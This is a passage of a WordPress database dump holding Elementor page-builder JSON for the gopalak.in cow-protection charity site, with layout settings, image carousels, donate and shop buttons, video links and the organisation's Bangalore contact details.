mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11174,1861,'_elementor_page_assets','a:0:{}'),(11181,1863,'_elementor_edit_mode','builder'),(11182,1863,'_elementor_template_type','wp-page'),(11183,1863,'_elementor_version','3.7.8'),(11184,1863,'_wp_page_template','elementor_canvas'),(11185,1863,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11186,1863,'_elementor_page_assets','a:0:{}'),(11187,1864,'_elementor_edit_mode','builder'),(11188,1864,'_elementor_template_type','wp-page'),(11189,1864,'_elementor_version','3.7.8'),(11190,1864,'_wp_page_template','elementor_canvas'),(11191,1864,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\